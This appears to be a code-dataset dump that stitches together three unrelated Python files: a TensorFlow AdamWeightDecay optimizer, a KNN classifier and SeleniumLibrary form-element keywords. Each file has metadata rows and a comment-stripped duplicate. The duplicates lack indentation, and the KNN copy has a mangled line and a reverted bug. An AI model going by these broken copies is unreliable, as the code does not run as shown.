    super(AdamWeightDecay, self)._prepare_local(var_device, var_dtype,
                                                apply_state)
    # Cache the decay rate as a constant so the graph reuses one tensor.
    apply_state['weight_decay_rate'] = tf.constant(
        self.weight_decay_rate, name='adam_weight_decay_rate')

  def _decay_weights_op(self, var, learning_rate, apply_state):
    """Return an op applying decoupled weight decay to `var` (or a no-op)."""
    do_decay = self._do_use_weight_decay(var.name)
    if do_decay:
      # NOTE(review): assumes `apply_state` was populated by _prepare_local;
      # if a caller ever passes apply_state=None this would raise — confirm.
      return var.assign_sub(
          learning_rate * var *
          apply_state['weight_decay_rate'],
          use_locking=self._use_locking)
    return tf.no_op()

  def apply_gradients(self, grads_and_vars, name=None):
    """Clip gradients to global norm 1.0, then apply them.

    Bug fix: `name` was previously accepted but silently dropped; it is
    now forwarded to the parent implementation.
    """
    grads, tvars = list(zip(*grads_and_vars))
    (grads, _) = tf.clip_by_global_norm(grads, clip_norm=1.0)
    return super(AdamWeightDecay, self).apply_gradients(zip(grads, tvars),
                                                        name=name)

  def _get_lr(self, var_device, var_dtype, apply_state):
    """Retrieves the learning rate with the given state."""
    if apply_state is None:
      return self._decayed_lr_t[var_dtype], {}

    apply_state = apply_state or {}
    coefficients = apply_state.get((var_device, var_dtype))
    if coefficients is None:
      coefficients = self._fallback_apply_state(var_device, var_dtype)
      apply_state[(var_device, var_dtype)] = coefficients

    return coefficients['lr_t'], dict(apply_state=apply_state)

  def _resource_apply_dense(self, grad, var, apply_state=None):
    # Apply weight decay before the Adam update for this variable.
    lr_t, kwargs = self._get_lr(var.device, var.dtype.base_dtype, apply_state)
    decay = self._decay_weights_op(var, lr_t, apply_state)
    with tf.control_dependencies([decay]):
      return super(AdamWeightDecay, self)._resource_apply_dense(
          grad, var, **kwargs)

  def _resource_apply_sparse(self, grad, var, indices, apply_state=None):
    lr_t, kwargs = self._get_lr(var.device, var.dtype.base_dtype, apply_state)
    decay = self._decay_weights_op(var, lr_t, apply_state)
    with tf.control_dependencies([decay]):
      return super(AdamWeightDecay, self)._resource_apply_sparse(
          grad, var, indices, **kwargs)

  def get_config(self):
    config = super(AdamWeightDecay, self).get_config()
    config.update({
        'weight_decay_rate': self.weight_decay_rate,
    })
    return config

  def _do_use_weight_decay(self, param_name):
    """Whether to use L2 weight decay for `param_name`."""
    if self.weight_decay_rate == 0:
      return False

    if self._include_in_weight_decay:
      for r in self._include_in_weight_decay:
        if re.search(r, param_name) is not None:
          return True

    if self._exclude_from_weight_decay:
      for r in self._exclude_from_weight_decay:
        if re.search(r, param_name) is not None:
          return False
    return True
| 38.118557 | 80 | 0.692765 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
import tensorflow as tf
class WarmUp(tf.keras.optimizers.schedules.LearningRateSchedule):
def __init__(
self,
initial_learning_rate,
decay_schedule_fn,
warmup_steps,
power=1.0,
name=None):
super(WarmUp, self).__init__()
self.initial_learning_rate = initial_learning_rate
self.warmup_steps = warmup_steps
self.power = power
self.decay_schedule_fn = decay_schedule_fn
self.name = name
def __call__(self, step):
with tf.name_scope(self.name or 'WarmUp') as name:
global_step_float = tf.cast(step, tf.float32)
warmup_steps_float = tf.cast(self.warmup_steps, tf.float32)
warmup_percent_done = global_step_float / warmup_steps_float
warmup_learning_rate = (
self.initial_learning_rate *
tf.math.pow(warmup_percent_done, self.power))
return tf.cond(global_step_float < warmup_steps_float,
lambda: warmup_learning_rate,
lambda: self.decay_schedule_fn(step),
name=name)
def get_config(self):
return {
'initial_learning_rate': self.initial_learning_rate,
'decay_schedule_fn': self.decay_schedule_fn,
'warmup_steps': self.warmup_steps,
'power': self.power,
'name': self.name
}
def create_optimizer(init_lr, num_train_steps, num_warmup_steps):
learning_rate_fn = tf.keras.optimizers.schedules.PolynomialDecay(
initial_learning_rate=init_lr,
decay_steps=num_train_steps,
end_learning_rate=0.0)
if num_warmup_steps:
learning_rate_fn = WarmUp(initial_learning_rate=init_lr,
decay_schedule_fn=learning_rate_fn,
warmup_steps=num_warmup_steps)
optimizer = AdamWeightDecay(
learning_rate=learning_rate_fn,
weight_decay_rate=0.01,
beta_1=0.9,
beta_2=0.999,
epsilon=1e-6,
exclude_from_weight_decay=['layer_norm', 'bias'])
return optimizer
class AdamWeightDecay(tf.keras.optimizers.Adam):
def __init__(self,
learning_rate=0.001,
beta_1=0.9,
beta_2=0.999,
epsilon=1e-7,
amsgrad=False,
weight_decay_rate=0.0,
include_in_weight_decay=None,
exclude_from_weight_decay=None,
name='AdamWeightDecay',
**kwargs):
super(AdamWeightDecay, self).__init__(
learning_rate, beta_1, beta_2, epsilon, amsgrad, name, **kwargs)
self.weight_decay_rate = weight_decay_rate
self._include_in_weight_decay = include_in_weight_decay
self._exclude_from_weight_decay = exclude_from_weight_decay
@classmethod
def from_config(cls, config):
custom_objects = {'WarmUp': WarmUp}
return super(AdamWeightDecay, cls).from_config(
config, custom_objects=custom_objects)
def _prepare_local(self, var_device, var_dtype, apply_state):
super(AdamWeightDecay, self)._prepare_local(var_device, var_dtype,
apply_state)
apply_state['weight_decay_rate'] = tf.constant(
self.weight_decay_rate, name='adam_weight_decay_rate')
def _decay_weights_op(self, var, learning_rate, apply_state):
do_decay = self._do_use_weight_decay(var.name)
if do_decay:
return var.assign_sub(
learning_rate * var *
apply_state['weight_decay_rate'],
use_locking=self._use_locking)
return tf.no_op()
def apply_gradients(self, grads_and_vars, name=None):
grads, tvars = list(zip(*grads_and_vars))
(grads, _) = tf.clip_by_global_norm(grads, clip_norm=1.0)
return super(AdamWeightDecay, self).apply_gradients(zip(grads, tvars))
def _get_lr(self, var_device, var_dtype, apply_state):
if apply_state is None:
return self._decayed_lr_t[var_dtype], {}
apply_state = apply_state or {}
coefficients = apply_state.get((var_device, var_dtype))
if coefficients is None:
coefficients = self._fallback_apply_state(var_device, var_dtype)
apply_state[(var_device, var_dtype)] = coefficients
return coefficients['lr_t'], dict(apply_state=apply_state)
def _resource_apply_dense(self, grad, var, apply_state=None):
lr_t, kwargs = self._get_lr(var.device, var.dtype.base_dtype, apply_state)
decay = self._decay_weights_op(var, lr_t, apply_state)
with tf.control_dependencies([decay]):
return super(AdamWeightDecay, self)._resource_apply_dense(
grad, var, **kwargs)
def _resource_apply_sparse(self, grad, var, indices, apply_state=None):
lr_t, kwargs = self._get_lr(var.device, var.dtype.base_dtype, apply_state)
decay = self._decay_weights_op(var, lr_t, apply_state)
with tf.control_dependencies([decay]):
return super(AdamWeightDecay, self)._resource_apply_sparse(
grad, var, indices, **kwargs)
def get_config(self):
config = super(AdamWeightDecay, self).get_config()
config.update({
'weight_decay_rate': self.weight_decay_rate,
})
return config
def _do_use_weight_decay(self, param_name):
if self.weight_decay_rate == 0:
return False
if self._include_in_weight_decay:
for r in self._include_in_weight_decay:
if re.search(r, param_name) is not None:
return True
if self._exclude_from_weight_decay:
for r in self._exclude_from_weight_decay:
if re.search(r, param_name) is not None:
return False
return True
| true | true |
f72338dbcf9c735ce7afecb1af39a35d7ce5035f | 5,732 | py | Python | KNN.py | ffcccc/MachineLearning | 78bc9c5df08b14f5d70ad5d6774c74f85a585c7e | [
"Apache-2.0"
] | null | null | null | KNN.py | ffcccc/MachineLearning | 78bc9c5df08b14f5d70ad5d6774c74f85a585c7e | [
"Apache-2.0"
] | null | null | null | KNN.py | ffcccc/MachineLearning | 78bc9c5df08b14f5d70ad5d6774c74f85a585c7e | [
"Apache-2.0"
] | null | null | null | """
@Filename: KNN.py
@Author: Danc1elion
@Author: ffcccc
@Create Date: 2019-04-29
@Update Date: 2019-05-03
@Description: Implement of KNN
"""
import numpy as np
import operator as op
import AClassifier
import preProcess
class KNNClassifier(AClassifier.aClassifier):
    """k-nearest-neighbour classifier.

    Parameters
    ----------
    k : int
        Number of neighbours consulted per prediction.
    norm_type : str
        "Normalization" (min-max scaling) or "Standardization" (z-score);
        applied to both training and test features via preProcess.
    """

    def __init__(self, k, norm_type="Normalization"):
        self.k = k
        # Bug fix: the constructor previously ignored `norm_type` and always
        # forced "Normalization", leaving the Standardization branches dead.
        self.norm_type = norm_type
        self.x_train = None
        self.y_train = None
        # Populated by predict(); initialized here so they always exist.
        self.prediction = None
        self.probability = None

    def _normalize(self, data):
        # Dispatch to the preprocessing routine selected at construction.
        if self.norm_type == "Standardization":
            return preProcess.Standardization(data)
        return preProcess.Normalization(data)

    def train(self, train_data, train_label):
        """Store normalized training features and labels.

        Returns self so calls can be chained.
        """
        self.x_train = self._normalize(train_data)
        self.y_train = train_label
        return self

    def predict(self, test_data):
        """Return an [n, 1] ndarray of predicted labels for *test_data*.

        Also records per-sample majority probabilities in self.probability.
        """
        test = self._normalize(test_data)
        test_num = test.shape[0]
        prediction = np.zeros([test_num, 1])
        probability = np.zeros([test_num, 1])
        for i in range(test_num):
            prediction[i], probability[i] = self.calculateDistance(
                test[i], self.x_train, self.y_train, self.k)
        self.prediction = prediction
        self.probability = probability
        return prediction

    def calculateDistance(self, input, train_data, train_label, k):
        """Return (label, prob) of the majority label among the k nearest
        training samples, using Euclidean distance.

        prob is the fraction of the k neighbours carrying that label.
        """
        # Broadcasting replaces the original np.tile copy; numerically
        # identical: sqrt(sum((train - input)^2, axis=1)).
        distances = np.sqrt(((train_data - input) ** 2).sum(axis=1))
        # Vote among the k closest samples.
        nearest = distances.argsort()
        label_count = {}
        for i in range(k):
            label = train_label[nearest[i]]
            label_count[label] = label_count.get(label, 0) + 1
        ranked = sorted(label_count.items(), key=op.itemgetter(1),
                        reverse=True)
        label = ranked[0][0]
        prob = ranked[0][1] / k
        return label, prob
| 40.942857 | 118 | 0.63695 |
import numpy as np
import operator as op
import AClassifier
import preProcess
class KNNClassifier(AClassifier.aClassifier):
def __init__(self, k, norm_type="Normalization"):
self.k = k
self.norm_type = "Normalization"
self.x_train = None
self.y_train = None
in_label):
if self.norm_type == "Standardization":
train_data = preProcess.Standardization(train_data)
else:
train_data = preProcess.Normalization(train_data)
self.x_train = train_data
self.y_train = train_label
return self
def predict(self, test_data):
if self.norm_type == "Standardization":
testData = preProcess.Standardization(test_data)
else:
testData = preProcess.Normalization(test_data)
test_num = testData.shape[0]
prediction = np.zeros([test_num, 1])
probability = np.zeros([test_num, 1])
for i in range(test_num):
prediction[i], probability[i] = self.calculateDistance(testData[i], self.x_train, self.y_train, self.k)
self.prediction = prediction
self.probability = probability
return prediction
def calculateDistance(self, input, train_data, train_label, k):
train_num = train_data.shape[0]
distances = np.tile(input, (train_num, 1)) - train_data
distances = distances**2
distances = distances.sum(axis=1)
distances = distances**0.5
disIndex = distances.argsort()
labelCount = {}
for i in range(k):
label = train_label[disIndex[i]]
labelCount[label] = labelCount.get(label, 0) + 1
prediction = sorted(labelCount.items(), key=op.itemgetter(1), reverse=True)
label = prediction[0][0]
prob = prediction[0][1]/k
return label, prob
| true | true |
f723390bec450459c3d07d06d9a3faf905aa89d2 | 17,433 | py | Python | src/SeleniumLibrary/keywords/formelement.py | chandapriya13/SeleniumLibrary | a82bb7c9511f6bac573eaaabb2b1dad0035d369e | [
"ECL-2.0",
"Apache-2.0"
] | 4 | 2017-12-18T02:21:48.000Z | 2019-06-12T01:32:40.000Z | src/SeleniumLibrary/keywords/formelement.py | chandapriya13/SeleniumLibrary | a82bb7c9511f6bac573eaaabb2b1dad0035d369e | [
"ECL-2.0",
"Apache-2.0"
] | 5 | 2018-12-03T17:01:30.000Z | 2019-03-30T16:09:01.000Z | src/SeleniumLibrary/keywords/formelement.py | chandapriya13/SeleniumLibrary | a82bb7c9511f6bac573eaaabb2b1dad0035d369e | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2018-01-23T16:11:55.000Z | 2018-01-23T16:11:55.000Z | # Copyright 2008-2011 Nokia Networks
# Copyright 2011-2016 Ryan Tomac, Ed Manlove and contributors
# Copyright 2016- Robot Framework Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from SeleniumLibrary.base import LibraryComponent, keyword
from SeleniumLibrary.errors import ElementNotFound
from SeleniumLibrary.utils import is_noney, is_truthy
class FormElementKeywords(LibraryComponent):
    """Keywords for interacting with HTML form elements.

    Covers form submission, checkboxes, radio buttons, text fields,
    text areas, buttons and file-upload inputs.  All locators follow the
    library's `Locating elements` syntax.
    """
    @keyword
    def submit_form(self, locator=None):
        """Submits a form identified by ``locator``.
        If ``locator`` is not given, first form on the page is submitted.
        See the `Locating elements` section for details about the locator
        syntax.
        """
        self.info("Submitting form '%s'." % locator)
        if is_noney(locator):
            locator = 'tag:form'
        element = self.find_element(locator, tag='form')
        element.submit()
    @keyword
    def checkbox_should_be_selected(self, locator):
        """Verifies checkbox ``locator`` is selected/checked.
        See the `Locating elements` section for details about the locator
        syntax.
        """
        self.info("Verifying checkbox '%s' is selected." % locator)
        element = self._get_checkbox(locator)
        if not element.is_selected():
            raise AssertionError("Checkbox '%s' should have been selected "
                                 "but was not." % locator)
    @keyword
    def checkbox_should_not_be_selected(self, locator):
        """Verifies checkbox ``locator`` is not selected/checked.
        See the `Locating elements` section for details about the locator
        syntax.
        """
        self.info("Verifying checkbox '%s' is not selected." % locator)
        element = self._get_checkbox(locator)
        if element.is_selected():
            raise AssertionError("Checkbox '%s' should not have been "
                                 "selected." % locator)
    @keyword
    def page_should_contain_checkbox(self, locator, message=None, loglevel='TRACE'):
        """Verifies checkbox ``locator`` is found from current page.
        See `Page Should Contain Element` for explanation about ``message``
        and ``loglevel`` arguments.
        See the `Locating elements` section for details about the locator
        syntax.
        """
        self.assert_page_contains(locator, 'checkbox', message, loglevel)
    @keyword
    def page_should_not_contain_checkbox(self, locator, message=None, loglevel='TRACE'):
        """Verifies checkbox ``locator`` is not found from current page.
        See `Page Should Contain Element` for explanation about ``message``
        and ``loglevel`` arguments.
        See the `Locating elements` section for details about the locator
        syntax.
        """
        self.assert_page_not_contains(locator, 'checkbox', message, loglevel)
    @keyword
    def select_checkbox(self, locator):
        """Selects checkbox identified by ``locator``.
        Does nothing if checkbox is already selected.
        See the `Locating elements` section for details about the locator
        syntax.
        """
        self.info("Selecting checkbox '%s'." % locator)
        element = self._get_checkbox(locator)
        if not element.is_selected():
            element.click()
    @keyword
    def unselect_checkbox(self, locator):
        """Removes selection of checkbox identified by ``locator``.
        Does nothing if the checkbox is not selected.
        See the `Locating elements` section for details about the locator
        syntax.
        """
        self.info("Unselecting checkbox '%s'." % locator)
        element = self._get_checkbox(locator)
        if element.is_selected():
            element.click()
    @keyword
    def page_should_contain_radio_button(self, locator, message=None, loglevel='TRACE'):
        """Verifies radio button ``locator`` is found from current page.
        See `Page Should Contain Element` for explanation about ``message``
        and ``loglevel`` arguments.
        See the `Locating elements` section for details about the locator
        syntax. When using the default locator strategy, radio buttons are
        searched using ``id``, ``name`` and ``value``.
        """
        self.assert_page_contains(locator, 'radio button', message, loglevel)
    @keyword
    def page_should_not_contain_radio_button(self, locator, message=None, loglevel='TRACE'):
        """Verifies radio button ``locator`` is not found from current page.
        See `Page Should Contain Element` for explanation about ``message``
        and ``loglevel`` arguments.
        See the `Locating elements` section for details about the locator
        syntax. When using the default locator strategy, radio buttons are
        searched using ``id``, ``name`` and ``value``.
        """
        self.assert_page_not_contains(locator, 'radio button', message,
                                      loglevel)
    @keyword
    def radio_button_should_be_set_to(self, group_name, value):
        """Verifies radio button group ``group_name`` is set to ``value``.
        ``group_name`` is the ``name`` of the radio button group.
        """
        self.info("Verifying radio button '%s' has selection '%s'."
                  % (group_name, value))
        elements = self._get_radio_buttons(group_name)
        actual_value = self._get_value_from_radio_buttons(elements)
        if actual_value is None or actual_value != value:
            raise AssertionError("Selection of radio button '%s' should have "
                                 "been '%s' but was '%s'."
                                 % (group_name, value, actual_value))
    @keyword
    def radio_button_should_not_be_selected(self, group_name):
        """Verifies radio button group ``group_name`` has no selection.
        ``group_name`` is the ``name`` of the radio button group.
        """
        self.info("Verifying radio button '%s' has no selection." % group_name)
        elements = self._get_radio_buttons(group_name)
        actual_value = self._get_value_from_radio_buttons(elements)
        if actual_value is not None:
            raise AssertionError("Radio button group '%s' should not have "
                                 "had selection, but '%s' was selected."
                                 % (group_name, actual_value))
    @keyword
    def select_radio_button(self, group_name, value):
        """Sets radio button group ``group_name`` to ``value``.
        The radio button to be selected is located by two arguments:
        - ``group_name`` is the name of the radio button group.
        - ``value`` is the ``id`` or ``value`` attribute of the actual
          radio button.
        Examples:
        | `Select Radio Button` | size    | XL    |
        | `Select Radio Button` | contact | email |
        """
        self.info("Selecting '%s' from radio button '%s'."
                  % (value, group_name))
        element = self._get_radio_button_with_value(group_name, value)
        if not element.is_selected():
            element.click()
    @keyword
    def choose_file(self, locator, file_path):
        """Inputs the ``file_path`` into file input field ``locator``.
        This keyword is most often used to input files into upload forms.
        The file specified with ``file_path`` must be available on the machine
        where tests are executed. When using Selenium Grid, Selenium will
        [https://seleniumhq.github.io/selenium/docs/api/py/webdriver_remote/selenium.webdriver.remote.command.html?highlight=upload#selenium.webdriver.remote.command.Command.UPLOAD_FILE|magically]
        transfer the file from the machine where tests are executed
        to the Selenium Grid node where the browser is running.
        Then Selenium will send the file path, from the node file
        system, to the browser.
        Example:
        | `Choose File` | my_upload_field | ${CURDIR}/trades.csv |
        """
        if not os.path.isfile(file_path):
            raise ValueError("File '%s' does not exist on the local file "
                             "system." % file_path)
        self.find_element(locator).send_keys(file_path)
    @keyword
    def input_password(self, locator, password, clear=True):
        """Types the given password into text field identified by ``locator``.
        See the `Locating elements` section for details about the locator
        syntax. See `Input Text` for ``clear`` argument details.
        Difference compared to `Input Text` is that this keyword does not
        log the given password on the INFO level. Notice that if you use
        the keyword like
        | Input Password | password_field | password |
        the password is shown as a normal keyword argument. A way to avoid
        that is using variables like
        | Input Password | password_field | ${PASSWORD} |
        Notice also that SeleniumLibrary logs all the communication with
        browser drivers using the DEBUG level, and the actual password can
        be seen there. Additionally Robot Framework logs all arguments using
        the TRACE level. Tests must thus not be executed using level below
        INFO if password should not be logged in any format.
        The `clear` argument is new in SeleniumLibrary 4.0
        """
        # Deliberately logs only the locator, never the password itself.
        self.info("Typing password into text field '%s'." % locator)
        self._input_text_into_text_field(locator, password, clear)
    @keyword
    def input_text(self, locator, text, clear=True):
        """Types the given ``text`` into text field identified by ``locator``.
        When ``clear`` is true, the input element is cleared before
        text is typed to the element. When false, the previous text
        is not cleared from the element. Use `Input Password` if you
        do not want the given ``text`` to be logged.
        See the `Locating elements` section for details about the locator
        syntax. See the `Boolean arguments` section how Boolean values are
        handled.
        The `clear` argument is new in SeleniumLibrary 4.0
        """
        self.info("Typing text '%s' into text field '%s'." % (text, locator))
        self._input_text_into_text_field(locator, text, clear)
    @keyword
    def page_should_contain_textfield(self, locator, message=None, loglevel='TRACE'):
        """Verifies text field ``locator`` is found from current page.
        See `Page Should Contain Element` for explanation about ``message``
        and ``loglevel`` arguments.
        See the `Locating elements` section for details about the locator
        syntax.
        """
        self.assert_page_contains(locator, 'text field', message, loglevel)
    @keyword
    def page_should_not_contain_textfield(self, locator, message=None, loglevel='TRACE'):
        """Verifies text field ``locator`` is not found from current page.
        See `Page Should Contain Element` for explanation about ``message``
        and ``loglevel`` arguments.
        See the `Locating elements` section for details about the locator
        syntax.
        """
        self.assert_page_not_contains(locator, 'text field', message, loglevel)
    @keyword
    def textfield_should_contain(self, locator, expected, message=None):
        """Verifies text field ``locator`` contains text ``expected``.
        ``message`` can be used to override the default error message.
        See the `Locating elements` section for details about the locator
        syntax.
        """
        actual = self._get_value(locator, 'text field')
        if expected not in actual:
            if is_noney(message):
                message = "Text field '%s' should have contained text '%s' "\
                          "but it contained '%s'." % (locator, expected, actual)
            raise AssertionError(message)
        self.info("Text field '%s' contains text '%s'." % (locator, expected))
    @keyword
    def textfield_value_should_be(self, locator, expected, message=None):
        """Verifies text field ``locator`` has exactly text ``expected``.
        ``message`` can be used to override default error message.
        See the `Locating elements` section for details about the locator
        syntax.
        """
        actual = self._get_value(locator, 'text field')
        if actual != expected:
            if is_noney(message):
                message = "Value of text field '%s' should have been '%s' "\
                          "but was '%s'." % (locator, expected, actual)
            raise AssertionError(message)
        self.info("Content of text field '%s' is '%s'." % (locator, expected))
    @keyword
    def textarea_should_contain(self, locator, expected, message=None):
        """Verifies text area ``locator`` contains text ``expected``.
        ``message`` can be used to override default error message.
        See the `Locating elements` section for details about the locator
        syntax.
        """
        actual = self._get_value(locator, 'text area')
        if expected not in actual:
            if is_noney(message):
                message = "Text area '%s' should have contained text '%s' " \
                          "but it had '%s'." % (locator, expected, actual)
            raise AssertionError(message)
        self.info("Text area '%s' contains text '%s'." % (locator, expected))
    @keyword
    def textarea_value_should_be(self, locator, expected, message=None):
        """Verifies text area ``locator`` has exactly text ``expected``.
        ``message`` can be used to override default error message.
        See the `Locating elements` section for details about the locator
        syntax.
        """
        actual = self._get_value(locator, 'text area')
        if expected != actual:
            if is_noney(message):
                message = "Text area '%s' should have had text '%s' " \
                          "but it had '%s'." % (locator, expected, actual)
            raise AssertionError(message)
        self.info("Content of text area '%s' is '%s'." % (locator, expected))
    @keyword
    def page_should_contain_button(self, locator, message=None, loglevel='TRACE'):
        """Verifies button ``locator`` is found from current page.
        See `Page Should Contain Element` for explanation about ``message``
        and ``loglevel`` arguments.
        See the `Locating elements` section for details about the locator
        syntax. When using the default locator strategy, buttons are
        searched using ``id``, ``name`` and ``value``.
        """
        # Buttons may be rendered as either <input> or <button>; accept both.
        try:
            self.assert_page_contains(locator, 'input', message, loglevel)
        except AssertionError:
            self.assert_page_contains(locator, 'button', message, loglevel)
    @keyword
    def page_should_not_contain_button(self, locator, message=None, loglevel='TRACE'):
        """Verifies button ``locator`` is not found from current page.
        See `Page Should Contain Element` for explanation about ``message``
        and ``loglevel`` arguments.
        See the `Locating elements` section for details about the locator
        syntax. When using the default locator strategy, buttons are
        searched using ``id``, ``name`` and ``value``.
        """
        # Must be absent as both <button> and <input>.
        self.assert_page_not_contains(locator, 'button', message, loglevel)
        self.assert_page_not_contains(locator, 'input', message, loglevel)
    # Return the 'value' attribute of the element matched as ``tag``.
    def _get_value(self, locator, tag):
        return self.find_element(locator, tag).get_attribute('value')
    # Locate a checkbox element; raises if not found.
    def _get_checkbox(self, locator):
        return self.find_element(locator, tag='checkbox')
    # Return all radio inputs whose name attribute equals ``group_name``.
    def _get_radio_buttons(self, group_name):
        xpath = "xpath://input[@type='radio' and @name='%s']" % group_name
        self.debug('Radio group locator: ' + xpath)
        elements = self.find_elements(xpath)
        if not elements:
            raise ElementNotFound("No radio button with name '%s' found."
                                  % group_name)
        return elements
    # Return the radio input in ``group_name`` whose value OR id matches.
    def _get_radio_button_with_value(self, group_name, value):
        xpath = "xpath://input[@type='radio' and @name='%s' and " \
                "(@value='%s' or @id='%s')]" % (group_name, value, value)
        self.debug('Radio group locator: ' + xpath)
        try:
            return self.find_element(xpath)
        except ElementNotFound:
            raise ElementNotFound("No radio button with name '%s' and "
                                  "value '%s' found." % (group_name, value))
    # Return the 'value' of the selected radio button, or None if none is.
    def _get_value_from_radio_buttons(self, elements):
        for element in elements:
            if element.is_selected():
                return element.get_attribute('value')
        return None
    # Shared implementation for Input Text / Input Password.
    def _input_text_into_text_field(self, locator, text, clear):
        element = self.find_element(locator)
        if is_truthy(clear):
            element.clear()
        element.send_keys(text)
| 41.507143 | 197 | 0.634601 |
import os
from SeleniumLibrary.base import LibraryComponent, keyword
from SeleniumLibrary.errors import ElementNotFound
from SeleniumLibrary.utils import is_noney, is_truthy
class FormElementKeywords(LibraryComponent):
@keyword
def submit_form(self, locator=None):
self.info("Submitting form '%s'." % locator)
if is_noney(locator):
locator = 'tag:form'
element = self.find_element(locator, tag='form')
element.submit()
@keyword
def checkbox_should_be_selected(self, locator):
self.info("Verifying checkbox '%s' is selected." % locator)
element = self._get_checkbox(locator)
if not element.is_selected():
raise AssertionError("Checkbox '%s' should have been selected "
"but was not." % locator)
@keyword
def checkbox_should_not_be_selected(self, locator):
self.info("Verifying checkbox '%s' is not selected." % locator)
element = self._get_checkbox(locator)
if element.is_selected():
raise AssertionError("Checkbox '%s' should not have been "
"selected." % locator)
@keyword
def page_should_contain_checkbox(self, locator, message=None, loglevel='TRACE'):
self.assert_page_contains(locator, 'checkbox', message, loglevel)
@keyword
def page_should_not_contain_checkbox(self, locator, message=None, loglevel='TRACE'):
self.assert_page_not_contains(locator, 'checkbox', message, loglevel)
@keyword
def select_checkbox(self, locator):
self.info("Selecting checkbox '%s'." % locator)
element = self._get_checkbox(locator)
if not element.is_selected():
element.click()
@keyword
def unselect_checkbox(self, locator):
self.info("Unselecting checkbox '%s'." % locator)
element = self._get_checkbox(locator)
if element.is_selected():
element.click()
@keyword
def page_should_contain_radio_button(self, locator, message=None, loglevel='TRACE'):
self.assert_page_contains(locator, 'radio button', message, loglevel)
@keyword
def page_should_not_contain_radio_button(self, locator, message=None, loglevel='TRACE'):
self.assert_page_not_contains(locator, 'radio button', message,
loglevel)
@keyword
def radio_button_should_be_set_to(self, group_name, value):
self.info("Verifying radio button '%s' has selection '%s'."
% (group_name, value))
elements = self._get_radio_buttons(group_name)
actual_value = self._get_value_from_radio_buttons(elements)
if actual_value is None or actual_value != value:
raise AssertionError("Selection of radio button '%s' should have "
"been '%s' but was '%s'."
% (group_name, value, actual_value))
@keyword
def radio_button_should_not_be_selected(self, group_name):
self.info("Verifying radio button '%s' has no selection." % group_name)
elements = self._get_radio_buttons(group_name)
actual_value = self._get_value_from_radio_buttons(elements)
if actual_value is not None:
raise AssertionError("Radio button group '%s' should not have "
"had selection, but '%s' was selected."
% (group_name, actual_value))
@keyword
def select_radio_button(self, group_name, value):
self.info("Selecting '%s' from radio button '%s'."
% (value, group_name))
element = self._get_radio_button_with_value(group_name, value)
if not element.is_selected():
element.click()
@keyword
def choose_file(self, locator, file_path):
if not os.path.isfile(file_path):
raise ValueError("File '%s' does not exist on the local file "
"system." % file_path)
self.find_element(locator).send_keys(file_path)
@keyword
def input_password(self, locator, password, clear=True):
self.info("Typing password into text field '%s'." % locator)
self._input_text_into_text_field(locator, password, clear)
@keyword
def input_text(self, locator, text, clear=True):
self.info("Typing text '%s' into text field '%s'." % (text, locator))
self._input_text_into_text_field(locator, text, clear)
@keyword
def page_should_contain_textfield(self, locator, message=None, loglevel='TRACE'):
self.assert_page_contains(locator, 'text field', message, loglevel)
@keyword
def page_should_not_contain_textfield(self, locator, message=None, loglevel='TRACE'):
self.assert_page_not_contains(locator, 'text field', message, loglevel)
@keyword
def textfield_should_contain(self, locator, expected, message=None):
actual = self._get_value(locator, 'text field')
if expected not in actual:
if is_noney(message):
message = "Text field '%s' should have contained text '%s' "\
"but it contained '%s'." % (locator, expected, actual)
raise AssertionError(message)
self.info("Text field '%s' contains text '%s'." % (locator, expected))
@keyword
def textfield_value_should_be(self, locator, expected, message=None):
actual = self._get_value(locator, 'text field')
if actual != expected:
if is_noney(message):
message = "Value of text field '%s' should have been '%s' "\
"but was '%s'." % (locator, expected, actual)
raise AssertionError(message)
self.info("Content of text field '%s' is '%s'." % (locator, expected))
@keyword
def textarea_should_contain(self, locator, expected, message=None):
actual = self._get_value(locator, 'text area')
if expected not in actual:
if is_noney(message):
message = "Text area '%s' should have contained text '%s' " \
"but it had '%s'." % (locator, expected, actual)
raise AssertionError(message)
self.info("Text area '%s' contains text '%s'." % (locator, expected))
@keyword
def textarea_value_should_be(self, locator, expected, message=None):
actual = self._get_value(locator, 'text area')
if expected != actual:
if is_noney(message):
message = "Text area '%s' should have had text '%s' " \
"but it had '%s'." % (locator, expected, actual)
raise AssertionError(message)
self.info("Content of text area '%s' is '%s'." % (locator, expected))
@keyword
def page_should_contain_button(self, locator, message=None, loglevel='TRACE'):
try:
self.assert_page_contains(locator, 'input', message, loglevel)
except AssertionError:
self.assert_page_contains(locator, 'button', message, loglevel)
@keyword
def page_should_not_contain_button(self, locator, message=None, loglevel='TRACE'):
self.assert_page_not_contains(locator, 'button', message, loglevel)
self.assert_page_not_contains(locator, 'input', message, loglevel)
def _get_value(self, locator, tag):
return self.find_element(locator, tag).get_attribute('value')
def _get_checkbox(self, locator):
return self.find_element(locator, tag='checkbox')
def _get_radio_buttons(self, group_name):
xpath = "xpath://input[@type='radio' and @name='%s']" % group_name
self.debug('Radio group locator: ' + xpath)
elements = self.find_elements(xpath)
if not elements:
raise ElementNotFound("No radio button with name '%s' found."
% group_name)
return elements
def _get_radio_button_with_value(self, group_name, value):
xpath = "xpath://input[@type='radio' and @name='%s' and " \
"(@value='%s' or @id='%s')]" % (group_name, value, value)
self.debug('Radio group locator: ' + xpath)
try:
return self.find_element(xpath)
except ElementNotFound:
raise ElementNotFound("No radio button with name '%s' and "
"value '%s' found." % (group_name, value))
def _get_value_from_radio_buttons(self, elements):
for element in elements:
if element.is_selected():
return element.get_attribute('value')
return None
def _input_text_into_text_field(self, locator, text, clear):
element = self.find_element(locator)
if is_truthy(clear):
element.clear()
element.send_keys(text)
| true | true |
f723396434a2a3221ad85a3010ec7484b2d1378c | 219 | py | Python | Questoes/b1_q10_quadrado.py | viniciusm0raes/python | c4d4f1a08d1e4de105109e1f67fae9fcc20d7fce | [
"MIT"
] | null | null | null | Questoes/b1_q10_quadrado.py | viniciusm0raes/python | c4d4f1a08d1e4de105109e1f67fae9fcc20d7fce | [
"MIT"
] | null | null | null | Questoes/b1_q10_quadrado.py | viniciusm0raes/python | c4d4f1a08d1e4de105109e1f67fae9fcc20d7fce | [
"MIT"
